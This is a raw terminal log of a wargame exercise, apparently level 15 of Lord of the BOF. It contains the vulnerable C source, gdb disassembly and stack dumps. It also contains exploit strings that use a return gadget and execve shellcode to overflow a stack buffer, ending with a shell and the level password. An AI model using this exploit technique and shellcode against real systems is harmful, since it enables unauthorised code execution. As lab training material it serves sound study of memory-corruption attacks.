login: giant
Password:
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ cat assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
memset(buffer, 0, 44);
}
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ gdb -q assassin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
[1]+ Stopped gdb -q assassin
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ls
assassin assassin.c
[giant@localhost giant]$ cp assassin essessin
[giant@localhost giant]$ ./essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "
> \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
File "<string>", line 1
print "\x90"*44 + "a"*12 + "\x90"*100 + "
^
SyntaxError: invalid token
argv error
[giant@localhost giant]$ ls
assassin assassin.c essessin
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb) b*main+6
Breakpoint 1 at 0x8048476
(gdb) r `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*12 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048476 in main ()
(gdb) x/300x $esp
0xbffffa40: 0xbffffa68 0x4000a970 0x400f855b 0x080495d4
0xbffffa50: 0x4000ae60 0xbffffab4 0xbffffa68 0x0804845b
0xbffffa60: 0x080495c0 0x080495d4 0xbffffa88 0x400309cb
0xbffffa70: 0x00000002 0xbffffab4 0xbffffac0 0x40013868
0xbffffa80: 0x00000002 0x080483c0 0x00000000 0x080483e1
0xbffffa90: 0x08048470 0x00000002 0xbffffab4 0x08048308
0xbffffaa0: 0x0804854c 0x4000ae60 0xbffffaac 0x40013e90
0xbffffab0: 0x00000002 0xbffffbb3 0xbffffbc8 0x00000000
0xbffffac0: 0xbffffc7e 0xbffffca0 0xbffffcaa 0xbffffcb8
0xbffffad0: 0xbffffcd7 0xbffffce5 0xbffffcfe 0xbffffd19
0xbffffae0: 0xbffffd38 0xbffffd43 0xbffffd51 0xbffffd92
0xbffffaf0: 0xbffffda3 0xbffffdb8 0xbffffdc8 0xbffffdd3
0xbffffb00: 0xbffffdf0 0xbffffdfb 0xbffffe0c 0xbffffe1c
0xbffffb10: 0xbffffe24 0x00000000 0x00000003 0x08048034
0xbffffb20: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffb30: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffb40: 0x00000008 0x00000000 0x00000009 0x080483c0
0xbffffb50: 0x0000000b 0x00000202 0x0000000c 0x00000202
0xbffffb60: 0x0000000d 0x00000202 0x0000000e 0x00000202
0xbffffb70: 0x00000010 0x0f8bfbff 0x0000000f 0xbffffbae
0xbffffb80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba0: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffbb0: 0x2f003638 0x656d6f68 0x6169672f 0x652f746e
0xbffffbc0: 0x73657373 0x006e6973 0x90909090 0x90909090
0xbffffbd0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf0: 0x90909090 0x61616161 0x61616161 0x61616161
0xbffffc00: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc60: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffc70: 0x50e3896e 0x89e18953 0xcd0bb0c2 0x454c0080
0xbffffc80: 0x504f5353 0x7c3d4e45 0x7273752f 0x6e69622f
0xbffffc90: 0x73656c2f 0x70697073 0x68732e65 0x00732520
0xbffffca0: 0x52455355 0x454d414e 0x4948003d 0x49535453
0xbffffcb0: 0x313d455a 0x00303030 0x54534f48 0x454d414e
0xbffffcc0: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f
0xbffffcd0: 0x616d6f64 0x4c006e69 0x414e474f 0x673d454d
0xbffffce0: 0x746e6169 0x4d455200 0x4845544f 0x3d54534f
0xbffffcf0: 0x2e323931 0x2e383631 0x2e343831 0x414d0031
0xbffffd00: 0x2f3d4c49 0x2f726176 0x6f6f7073 0x616d2f6c
0xbffffd10: 0x672f6c69 0x746e6169 0x43414d00 0x50595448
0xbffffd20: 0x33693d45 0x722d3638 0x61686465 0x696c2d74
0xbffffd30: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d
0xbffffd40: 0x48006d72 0x5454534f 0x3d455059 0x36383369
0xbffffd50: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f
0xbffffd60: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273
0xbffffd70: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36
0xbffffd80: 0x682f3a6e 0x2f656d6f 0x6e616967 0x69622f74
0xbffffd90: 0x4f48006e 0x2f3d454d 0x656d6f68 0x6169672f
0xbffffda0: 0x4900746e 0x5455504e 0x2f3d4352 0x2f637465
0xbffffdb0: 0x75706e69 0x00637274 0x4c454853 0x622f3d4c
0xbffffdc0: 0x622f6e69 0x00687361 0x52455355 0x6169673d
0xbffffdd0: 0x4200746e 0x5f485341 0x3d564e45 0x6d6f682f
0xbffffde0: 0x69672f65 0x2f746e61 0x7361622e 0x00637268
0xbffffdf0: 0x474e414c 0x5f6e653d 0x4f005355 0x50595453
0xbffffe00: 0x696c3d45 0x2d78756e 0x00756e67 0x3d445750
0xbffffe10: 0x6d6f682f 0x69672f65 0x00746e61 0x564c4853
0xbffffe20: 0x00323d4c 0x435f534c 0x524f4c4f 0x6f6e3d53
0xbffffe30: 0x3a30303d 0x303d6966 0x69643a30 0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+ Stopped gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ bash2
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\xe0\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
Illegal instruction
[giant@localhost giant]$ gdb -q essessin
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
0x8048476 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push 0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add %esp,4
0x8048489 <main+25>: push 0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add %esp,4
0x8048493 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048496 <main+38>: add %eax,4
0x8048499 <main+41>: mov %edx,DWORD PTR [%eax]
0x804849b <main+43>: add %edx,47
0x804849e <main+46>: cmp BYTE PTR [%edx],0xbf
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push 0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add %esp,4
0x80484b0 <main+64>: push 0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add %esp,4
0x80484ba <main+74>: lea %esi,[%esi]
0x80484c0 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x80484c3 <main+83>: add %eax,4
0x80484c6 <main+86>: mov %edx,DWORD PTR [%eax]
0x80484c8 <main+88>: add %edx,47
0x80484cb <main+91>: cmp BYTE PTR [%edx],0x40
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push 0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add %esp,4
0x80484dd <main+109>: push 0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add %esp,4
0x80484e7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484ea <main+122>: add %eax,4
0x80484ed <main+125>: mov %edx,DWORD PTR [%eax]
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea %eax,[%ebp-40]
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add %esp,8
0x80484fc <main+140>: lea %eax,[%ebp-40]
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push 0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add %esp,8
0x804850d <main+157>: push 44
0x804850f <main+159>: push 0
0x8048511 <main+161>: lea %eax,[%ebp-40]
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add %esp,12
0x804851d <main+173>: leave
0x804851e <main+174>: ret
0x804851f <main+175>: nop
End of assembler dump.
(gdb) b*main
Breakpoint 1 at 0x8048470
(gdb) r `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Starting program: /home/giant/essessin `python -c 'print "\x90"*44 + "a"*8 + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Breakpoint 1, 0x8048470 in main ()
(gdb) x/300x $esp
0xbffffa7c: 0x400309cb 0x00000002 0xbffffac4 0xbffffad0
0xbffffa8c: 0x40013868 0x00000002 0x080483c0 0x00000000
0xbffffa9c: 0x080483e1 0x08048470 0x00000002 0xbffffac4
0xbffffaac: 0x08048308 0x0804854c 0x4000ae60 0xbffffabc
0xbffffabc: 0x40013e90 0x00000002 0xbffffbb7 0xbffffbcc
0xbffffacc: 0x00000000 0xbffffc7e 0xbffffca0 0xbffffcaa
0xbffffadc: 0xbffffcb8 0xbffffcd7 0xbffffce5 0xbffffcfe
0xbffffaec: 0xbffffd19 0xbffffd38 0xbffffd43 0xbffffd51
0xbffffafc: 0xbffffd92 0xbffffda3 0xbffffdb8 0xbffffdc8
0xbffffb0c: 0xbffffdd3 0xbffffdf0 0xbffffdfb 0xbffffe0c
0xbffffb1c: 0xbffffe1c 0xbffffe24 0x00000000 0x00000003
0xbffffb2c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb3c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb4c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb5c: 0x080483c0 0x0000000b 0x00000202 0x0000000c
0xbffffb6c: 0x00000202 0x0000000d 0x00000202 0x0000000e
0xbffffb7c: 0x00000202 0x00000010 0x0f8bfbff 0x0000000f
0xbffffb8c: 0xbffffbb2 0x00000000 0x00000000 0x00000000
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffffbbc: 0x6169672f 0x652f746e 0x73657373 0x006e6973
0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbec: 0x90909090 0x90909090 0x90909090 0x61616161
0xbffffbfc: 0x61616161 0x90909090 0x90909090 0x90909090
0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc5c: 0x90909090 0x90909090 0x6850c031 0x68732f2f
0xbffffc6c: 0x69622f68 0x50e3896e 0x89e18953 0xcd0bb0c2
0xbffffc7c: 0x454c0080 0x504f5353 0x7c3d4e45 0x7273752f
0xbffffc8c: 0x6e69622f 0x73656c2f 0x70697073 0x68732e65
0xbffffc9c: 0x00732520 0x52455355 0x454d414e 0x4948003d
0xbffffcac: 0x49535453 0x313d455a 0x00303030 0x54534f48
0xbffffcbc: 0x454d414e 0x636f6c3d 0x6f686c61 0x6c2e7473
0xbffffccc: 0x6c61636f 0x616d6f64 0x4c006e69 0x414e474f
0xbffffcdc: 0x673d454d 0x746e6169 0x4d455200 0x4845544f
0xbffffcec: 0x3d54534f 0x2e323931 0x2e383631 0x2e343831
0xbffffcfc: 0x414d0031 0x2f3d4c49 0x2f726176 0x6f6f7073
0xbffffd0c: 0x616d2f6c 0x672f6c69 0x746e6169 0x43414d00
0xbffffd1c: 0x50595448 0x33693d45 0x722d3638 0x61686465
0xbffffd2c: 0x696c2d74 0x2d78756e 0x00756e67 0x4d524554
0xbffffd3c: 0x6574783d 0x48006d72 0x5454534f 0x3d455059
0xbffffd4c: 0x36383369 0x54415000 0x752f3d48 0x6c2f7273
0xbffffd5c: 0x6c61636f 0x6e69622f 0x69622f3a 0x752f3a6e
0xbffffd6c: 0x622f7273 0x2f3a6e69 0x2f727375 0x52313158
0xbffffd7c: 0x69622f36 0x682f3a6e 0x2f656d6f 0x6e616967
0xbffffd8c: 0x69622f74 0x4f48006e 0x2f3d454d 0x656d6f68
0xbffffd9c: 0x6169672f 0x4900746e 0x5455504e 0x2f3d4352
0xbffffdac: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbffffdbc: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbffffdcc: 0x6169673d 0x4200746e 0x5f485341 0x3d564e45
0xbffffddc: 0x6d6f682f 0x69672f65 0x2f746e61 0x7361622e
0xbffffdec: 0x00637268 0x474e414c 0x5f6e653d 0x4f005355
0xbffffdfc: 0x50595453 0x696c3d45 0x2d78756e 0x00756e67
0xbffffe0c: 0x3d445750 0x6d6f682f 0x69672f65 0x00746e61
0xbffffe1c: 0x564c4853 0x00333d4c 0x435f534c 0x524f4c4f
0xbffffe2c: 0x6f6e3d53 0x3a30303d 0x303d6966 0x69643a30
0xbffffe3c: 0x3b31303d 0x6c3a3433 0x31303d6e 0x3a36333b
0xbffffe4c: 0x343d6970 0x33333b30 0x3d6f733a 0x333b3130
0xbffffe5c: 0x64623a35 0x3b30343d 0x303b3333 0x64633a31
0xbffffe6c: 0x3b30343d 0x303b3333 0x726f3a31 0x3b31303d
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)
[1]+ Stopped gdb -q essessin
[giant@localhost giant]$ ./assassin `python -c 'print "\x90"*44 + "\x1e\x85\x04\x08" + "\x0c\xfc\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒▒°
̀
bash$ my-pass
euid = 515
pushing me away
bash$
LOB 15번
2020. 8. 2. 00:11